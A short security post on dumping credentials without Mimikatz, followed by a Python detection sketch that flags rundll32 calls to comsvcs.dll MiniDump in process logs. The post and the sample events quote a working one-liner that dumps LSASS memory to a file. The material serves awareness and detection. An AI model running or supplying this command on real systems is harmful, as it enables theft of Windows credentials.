#CredentialDumping without Mimikatz
Used to see this used years ago by APT groups, now seeing ransomware, pentesters and other TAs use this nonstop 😭
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\<NAME>.dmp full;Wait-Process -Id (Get-Process rundll32).id
https://t.co/PH3SvDF7kZ
from inversecos
twit https://twitter.com/inversecos/status/1450331995112804358
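
A detection-side sketch for the command line quoted above, added here as an example and not part of the original tweet: it scans process-creation records for rundll32 invoking comsvcs.dll with MiniDump and pulls out the target PID and dump path for triage. The record fields (Sysmon Event ID 1 style `Image` and `CommandLine`), the sample events, and the function names are assumptions constructed for illustration.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe comsvcs.dll, MiniDump 612 Temp\example.dmp full"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\RUNDLL32.EXE" C:\Windows\System32\COMSVCS.DLL,minidump 612 "C:\Temp\my dump.dmp" full'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\example.dmp full"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

# All three tokens must appear (case-insensitive) for a record to be flagged.
TOKENS = [re.compile(p, re.I) for p in
          (r"\brundll32(\.exe)?\b", r"\bcomsvcs(\.dll)?\b", r"\bminidump\b")]

# MiniDump arguments: a numeric PID or an unexpanded "(...).Prop" expression,
# then the output path (quoted paths may contain spaces).
ARGS = re.compile(
    r'minidump[\s,]+(?P<pid>\d+|\([^)]*\)\.\w+)\s+(?P<path>"[^"]+"|\S+)', re.I)

def detect(event):
    """Return a triage finding for a comsvcs.dll MiniDump invocation, else None."""
    cmd = event.get("CommandLine", "")
    haystack = event.get("Image", "") + " " + cmd
    if not all(t.search(haystack) for t in TOKENS):
        return None
    finding = {"image": event.get("Image"), "pid_raw": None,
               "target_pid": None, "dump_path": None}
    m = ARGS.search(cmd)
    if m:
        raw = m.group("pid")
        finding["pid_raw"] = raw
        # Only a literal number can be compared against the lsass PID later.
        finding["target_pid"] = int(raw) if raw.isdigit() else None
        finding["dump_path"] = m.group("path").strip('"')
    return finding

def scan(events):
    """Run detect() over an iterable of records and keep the hits."""
    return [f for f in map(detect, events) if f]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

During triage, compare `target_pid` with the lsass.exe PID recorded on that host at the time, and use `dump_path` to locate and preserve the dump file.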